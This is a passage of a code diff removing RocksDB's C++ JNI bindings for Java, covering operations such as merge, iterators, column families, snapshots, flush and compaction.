-                              jend_key_off, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options,
-    jbyteArray jbegin_key, jint jbegin_key_off, jint jbegin_key_len,
-    jbyteArray jend_key, jint jend_key_off, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_range_helper(env, db, *write_options, cf_handle, jbegin_key,
-                                jbegin_key_off, jbegin_key_len, jend_key,
-                                jend_key_off, jend_key_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(
-        env, rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Merge
-
-/**
- * @return true if the merge succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_merge_helper(JNIEnv* env, rocksdb::DB* db,
-                          const rocksdb::WriteOptions& write_options,
-                          rocksdb::ColumnFamilyHandle* cf_handle,
-                          jbyteArray jkey, jint jkey_off, jint jkey_len,
-                          jbyteArray jval, jint jval_off, jint jval_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  jbyte* value = new jbyte[jval_len];
-  env->GetByteArrayRegion(jval, jval_off, jval_len, value);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] value;
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice value_slice(reinterpret_cast<char*>(value), jval_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Merge(write_options, cf_handle, key_slice, value_slice);
-  } else {
-    s = db->Merge(write_options, key_slice, value_slice);
-  }
-
-  // cleanup
-  delete [] value;
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_merge__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                 jlong jdb_handle,
-                                                 jbyteArray jkey, jint jkey_off,
-                                                 jint jkey_len, jbyteArray jval,
-                                                 jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-
-  rocksdb_merge_helper(env, db, default_write_options, nullptr, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_merge__J_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jbyteArray jval, jint jval_off, jint jval_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_merge_helper(env, db, default_write_options, cf_handle, jkey,
-                         jkey_off, jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_merge__JJ_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options_handle);
-
-  rocksdb_merge_helper(env, db, *write_options, nullptr, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_merge__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_merge_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-                         jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::~DB()
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_disposeInternal(
-    JNIEnv* env, jobject java_db, jlong jhandle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jhandle);
-  assert(db != nullptr);
-  delete db;
-}
-
-jlong rocksdb_iterator_helper(
-    rocksdb::DB* db, rocksdb::ReadOptions read_options,
-    rocksdb::ColumnFamilyHandle* cf_handle) {
-  rocksdb::Iterator* iterator = nullptr;
-  if (cf_handle != nullptr) {
-    iterator = db->NewIterator(read_options, cf_handle);
-  } else {
-    iterator = db->NewIterator(read_options);
-  }
-  return reinterpret_cast<jlong>(iterator);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterator
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_iterator__J(
-    JNIEnv* env, jobject jdb, jlong db_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  return rocksdb_iterator_helper(db, rocksdb::ReadOptions(),
-      nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterator
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iterator__JJ(
-    JNIEnv* env, jobject jdb, jlong db_handle,
-    jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  return rocksdb_iterator_helper(db, read_options,
-      nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iteratorCF
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iteratorCF__JJ(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  return rocksdb_iterator_helper(db, rocksdb::ReadOptions(),
-        cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iteratorCF
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iteratorCF__JJJ(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  return rocksdb_iterator_helper(db, read_options,
-        cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterators
- * Signature: (J[JJ)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_iterators(
-    JNIEnv* env, jobject jdb, jlong db_handle,
-    jlongArray jcolumn_family_handles, jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-        jread_options_handle);
-
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  if (jcolumn_family_handles != nullptr) {
-    const jsize len_cols = env->GetArrayLength(jcolumn_family_handles);
-    jlong* jcfh = env->GetLongArrayElements(jcolumn_family_handles, nullptr);
-    if(jcfh == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (jsize i = 0; i < len_cols; i++) {
-      auto* cf_handle =
-          reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcfh[i]);
-      cf_handles.push_back(cf_handle);
-    }
-
-    env->ReleaseLongArrayElements(jcolumn_family_handles, jcfh, JNI_ABORT);
-  }
-
-  std::vector<rocksdb::Iterator*> iterators;
-  rocksdb::Status s = db->NewIterators(read_options,
-      cf_handles, &iterators);
-  if (s.ok()) {
-    jlongArray jLongArray =
-        env->NewLongArray(static_cast<jsize>(iterators.size()));
-    if(jLongArray == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (std::vector<rocksdb::Iterator*>::size_type i = 0;
-        i < iterators.size(); i++) {
-      env->SetLongArrayRegion(jLongArray, static_cast<jsize>(i), 1,
-                              const_cast<jlong*>(reinterpret_cast<const jlong*>(&iterators[i])));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jLongArray);
-        return nullptr;
-      }
-    }
-
-    return jLongArray;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getDefaultColumnFamily
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_getDefaultColumnFamily(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = db_handle->DefaultColumnFamily();
-  return reinterpret_cast<jlong>(cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    createColumnFamily
- * Signature: (J[BJ)J
- */
-jlong Java_org_rocksdb_RocksDB_createColumnFamily(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jcolumn_name, jlong jcolumn_options) {
-  rocksdb::ColumnFamilyHandle* handle;
-  jboolean has_exception = JNI_FALSE;
-  std::string column_name = rocksdb::JniUtil::byteString<std::string>(env,
-    jcolumn_name,
-    [](const char* str, const size_t len) { return std::string(str, len); },
-    &has_exception);
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    return 0;
-  }
-
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cfOptions =
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jcolumn_options);
-
-  rocksdb::Status s = db_handle->CreateColumnFamily(
-      *cfOptions, column_name, &handle);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(handle);
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    dropColumnFamily
- * Signature: (JJ)V;
- */
-void Java_org_rocksdb_RocksDB_dropColumnFamily(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jcf_handle) {
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db_handle->DropColumnFamily(cf_handle);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Method:    getSnapshot
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_getSnapshot(
-    JNIEnv* env, jobject jdb, jlong db_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  const rocksdb::Snapshot* snapshot = db->GetSnapshot();
-  return reinterpret_cast<jlong>(snapshot);
-}
-
-/*
- * Method:    releaseSnapshot
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RocksDB_releaseSnapshot(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong snapshot_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* snapshot = reinterpret_cast<rocksdb::Snapshot*>(snapshot_handle);
-  db->ReleaseSnapshot(snapshot);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getProperty0
- * Signature: (JLjava/lang/String;I)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_RocksDB_getProperty0__JLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jstring jproperty,
-    jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto *db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  std::string property_value;
-  bool retCode = db->GetProperty(property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return env->NewStringUTF(property_value.c_str());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getProperty0
- * Signature: (JJLjava/lang/String;I)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_RocksDB_getProperty0__JJLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jstring jproperty, jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  std::string property_value;
-  bool retCode = db->GetProperty(cf_handle, property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return env->NewStringUTF(property_value.c_str());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLongProperty
- * Signature: (JLjava/lang/String;I)L;
- */
-jlong Java_org_rocksdb_RocksDB_getLongProperty__JLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jstring jproperty,
-    jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  uint64_t property_value = 0;
-  bool retCode = db->GetIntProperty(property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return property_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLongProperty
- * Signature: (JJLjava/lang/String;I)L;
- */
-jlong Java_org_rocksdb_RocksDB_getLongProperty__JJLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jstring jproperty, jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  uint64_t property_value;
-  bool retCode = db->GetIntProperty(cf_handle, property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return property_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return 0;
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Flush
-
-void rocksdb_flush_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::FlushOptions& flush_options,
-  rocksdb::ColumnFamilyHandle* column_family_handle) {
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Flush(flush_options, column_family_handle);
-  } else {
-    s = db->Flush(flush_options);
-  }
-  if (!s.ok()) {
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    flush
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RocksDB_flush__JJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jflush_options) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* flush_options =
-      reinterpret_cast<rocksdb::FlushOptions*>(jflush_options);
-  rocksdb_flush_helper(env, db, *flush_options, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    flush
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_flush__JJJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jflush_options, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* flush_options =
-      reinterpret_cast<rocksdb::FlushOptions*>(jflush_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_flush_helper(env, db, *flush_options, cf_handle);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::CompactRange - Full
-
-void rocksdb_compactrange_helper(JNIEnv* env, rocksdb::DB* db,
-    rocksdb::ColumnFamilyHandle* cf_handle, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-
-  rocksdb::Status s;
-  rocksdb::CompactRangeOptions compact_options;
-  compact_options.change_level = jreduce_level;
-  compact_options.target_level = jtarget_level;
-  compact_options.target_path_id = static_cast<uint32_t>(jtarget_path_id);
-  if (cf_handle != nullptr) {
-    s = db->CompactRange(compact_options, cf_handle, nullptr, nullptr);
-  } else {
-    // backwards compatibility
-    s = db->CompactRange(compact_options, nullptr, nullptr);
-  }
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange0
- * Signature: (JZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange0__JZII(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb_compactrange_helper(env, db, nullptr, jreduce_level,
-      jtarget_level, jtarget_path_id);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange
- * Signature: (JZIIJ)V
- */
-void Java_org_rocksdb_RocksDB_compactRange__JZIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-     jboolean jreduce_level, jint jtarget_level,
-     jint jtarget_path_id, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_compactrange_helper(env, db, cf_handle, jreduce_level,
-      jtarget_level, jtarget_path_id);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::CompactRange - Range
-
-/**
- * @return true if the compact range succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_compactrange_helper(JNIEnv* env, rocksdb::DB* db,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jbegin, jint jbegin_len,
-    jbyteArray jend, jint jend_len, jboolean jreduce_level, jint jtarget_level,
-    jint jtarget_path_id) {
-
-  jbyte* begin = env->GetByteArrayElements(jbegin, nullptr);
-  if(begin == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return false;
-  }
-
-  jbyte* end = env->GetByteArrayElements(jend, nullptr);
-  if(end == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jbegin, begin, JNI_ABORT);
-    return false;
-  }
-
-  const rocksdb::Slice begin_slice(reinterpret_cast<char*>(begin), jbegin_len);
-  const rocksdb::Slice end_slice(reinterpret_cast<char*>(end), jend_len);
-
-  rocksdb::Status s;
-  rocksdb::CompactRangeOptions compact_options;
-  compact_options.change_level = jreduce_level;
-  compact_options.target_level = jtarget_level;
-  compact_options.target_path_id = static_cast<uint32_t>(jtarget_path_id);
-  if (cf_handle != nullptr) {
-    s = db->CompactRange(compact_options, cf_handle, &begin_slice, &end_slice);
-  } else {
-    // backwards compatibility
-    s = db->CompactRange(compact_options, &begin_slice, &end_slice);
-  }
-
-  env->ReleaseByteArrayElements(jend, end, JNI_ABORT);
-  env->ReleaseByteArrayElements(jbegin, begin, JNI_ABORT);
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange0
- * Signature: (J[BI[BIZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange0__J_3BI_3BIZII(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jbyteArray jbegin, jint jbegin_len,
-    jbyteArray jend, jint jend_len, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb_compactrange_helper(env, db, nullptr, jbegin, jbegin_len,
-      jend, jend_len, jreduce_level, jtarget_level, jtarget_path_id);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange
- * Signature: (JJ[BI[BIZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange__J_3BI_3BIZIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin,
-    jint jbegin_len, jbyteArray jend, jint jend_len,
-    jboolean jreduce_level, jint jtarget_level,
-    jint jtarget_path_id, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_compactrange_helper(env, db, cf_handle, jbegin, jbegin_len,
-      jend, jend_len, jreduce_level, jtarget_level, jtarget_path_id);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::PauseBackgroundWork
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    pauseBackgroundWork
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_pauseBackgroundWork(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto s = db->PauseBackgroundWork();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::ContinueBackgroundWork
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    continueBackgroundWork
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_continueBackgroundWork(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto s = db->ContinueBackgroundWork();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::GetLatestSequenceNumber
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLatestSequenceNumber
- * Signature: (J)V
- */
-jlong Java_org_rocksdb_RocksDB_getLatestSequenceNumber(JNIEnv* env,
-    jobject jdb, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  return db->GetLatestSequenceNumber();
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB enable/disable file deletions
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    enableFileDeletions
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_disableFileDeletions(JNIEnv* env,
-    jobject jdb, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db->DisableFileDeletions();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    enableFileDeletions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_RocksDB_enableFileDeletions(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jboolean jforce) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db->EnableFileDeletions(jforce);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::GetUpdatesSince
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getUpdatesSince
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_RocksDB_getUpdatesSince(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jlong jsequence_number) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::SequenceNumber sequence_number =
-      static_cast<rocksdb::SequenceNumber>(jsequence_number);
-  std::unique_ptr<rocksdb::TransactionLogIterator> iter;
-  rocksdb::Status s = db->GetUpdatesSince(sequence_number, &iter);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(iter.release());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    setOptions
- * Signature: (JJ[Ljava/lang/String;[Ljava/lang/String;)V
- */
-void Java_org_rocksdb_RocksDB_setOptions(JNIEnv* env, jobject jdb,
-    jlong jdb_handle, jlong jcf_handle, jobjectArray jkeys,
-    jobjectArray jvalues) {
-  const jsize len = env->GetArrayLength(jkeys);
-  assert(len == env->GetArrayLength(jvalues));
-
-  std::unordered_map<std::string, std::string> options_map;
-  for (jsize i = 0; i < len; i++) {
-    jobject jobj_key = env->GetObjectArrayElement(jkeys, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      return;
-    }
-
-    jobject jobj_value = env->GetObjectArrayElement(jvalues, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    jstring jkey = reinterpret_cast<jstring>(jobj_key);
-    jstring jval = reinterpret_cast<jstring>(jobj_value);
-
-    const char* key = env->GetStringUTFChars(jkey, nullptr);
-    if(key == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->DeleteLocalRef(jobj_value);
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    const char* value = env->GetStringUTFChars(jval, nullptr);
-    if(value == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseStringUTFChars(jkey, key);
-      env->DeleteLocalRef(jobj_value);
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    std::string s_key(key);
-    std::string s_value(value);
-    options_map[s_key] = s_value;
-
-    env->ReleaseStringUTFChars(jkey, key);
-    env->ReleaseStringUTFChars(jval, value);
-    env->DeleteLocalRef(jobj_key);
-    env->DeleteLocalRef(jobj_value);
-  }
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  db->SetOptions(cf_handle, options_map);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::IngestExternalFile
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    ingestExternalFile
- * Signature: (JJ[Ljava/lang/String;IJ)V
- */
-void Java_org_rocksdb_RocksDB_ingestExternalFile(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jcf_handle,
-    jobjectArray jfile_path_list, jint jfile_path_list_len,
-    jlong jingest_external_file_options_handle) {
-  jboolean has_exception = JNI_FALSE;
-  std::vector<std::string> file_path_list =
-      rocksdb::JniUtil::copyStrings(env, jfile_path_list, jfile_path_list_len,
-          &has_exception);
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    return;
-  }
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
